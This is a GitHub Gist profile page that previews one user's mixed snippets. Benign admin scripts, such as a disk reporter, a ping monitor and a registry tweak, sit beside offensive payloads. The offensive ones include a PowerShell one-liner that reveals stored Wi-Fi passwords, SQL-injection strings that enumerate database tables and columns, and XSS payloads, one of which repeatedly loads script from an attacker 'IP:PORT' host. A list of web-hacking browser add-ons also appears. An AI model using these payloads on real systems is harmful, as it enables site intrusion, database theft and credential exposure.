Skip to content

Instantly share code, notes, and snippets.

View Zobber's full-sized avatar
🎯
Focusing

Erick Z Zobber

🎯
Focusing
  • Universidad Nacional Abierta y a Distancia
  • Colombia
  • 13:11 (UTC -05:00)
View GitHub Profile
#!/bin/bash
#
# showmydisks - report partitions, types, filesystems, and disk space usage
#
PRGVERSION="v0.12 * 2015-09-12 (c) Andreas Schamanek"
# Copyright 2004-2015: Andreas Schamanek <[email protected]>
# Homepage: http://wox.at/as/_/showmydisks
# License + History: see end of file
lsblk --ascii -o "NAME,TYPE,SIZE,FSTYPE,MOUNTPOINT"
<?php
// This script is run every 5 minutes
// A ping failure will generate an email
// We ping critical servers that serve to identify both a server failure and/or a circuit or VPN failure.
// Define descriptions and ip addresses below to test on
$hosts = array(
array("description" => "Google.com", "hostip" => "www.google.com"),
array("description" => "Office1", "hostip" => "192.168.1.2")
);
$a = netsh.exe wlan show profiles | Select-String -Pattern ": "; For ($i=1; $i -le $a.length * 2; $i+=2){ $b = ($a -split "`t" -split ": ")[$i]; $c = netsh.exe wlan show profile name=$b key=clear | Select-String -Pattern "clave "; "Red: " + $b + $c}
#!/bin/sh
#
# ufetch-arch - tiny system info for arch
## INFO
# user is already defined
host="$(cat /etc/hostname)"
os='Arch Linux'
kernel="$(uname -sr)"
HackBar
-Cookies Manager+
-User-Agent Switcher
-Tamper Data
-FoxyProxy Standard
-Wappalyzer:
-HttpRequester
-RESTClient:
-Tampermonkey
-XSS Me
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\*\shell\runas]
@="Take Ownership"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\*\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
#!/bin/bash
###############################################################################
# Authentication Variables #
###############################################################################
# Credentials in the form of user:password for Kibana
kCreds=elastic:PASS
###############################################################################
# Kibana Variables #
"><details/open/ontoggle=confirm`/xss_by_Y000!/`>
(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)
CONCAT(0x5441424c45204e414d45533c62723e,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,2,0x30),0x3a20,table_name,0x3c62723e))))x))
"><script>setInterval(function(){d=document;z=d.createElement("script");z.src="//IP:PORT";d.body.appendChild(z)},0)</script>
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydGBZMDAwYDwvc2NyaXB0Pg=='></object>
cat eve.json |jq .flow_id |sort |uniq |grep -v null |xargs -I% grep % eve.json |ag 774699718895614 | jq -c 'select(.alert and .event_type and .metadata)|[.flow_id,.src_ip,.src_port,.dest_ip,.dest_port,.event_type,.alert.signature,.metadata.flowbits]'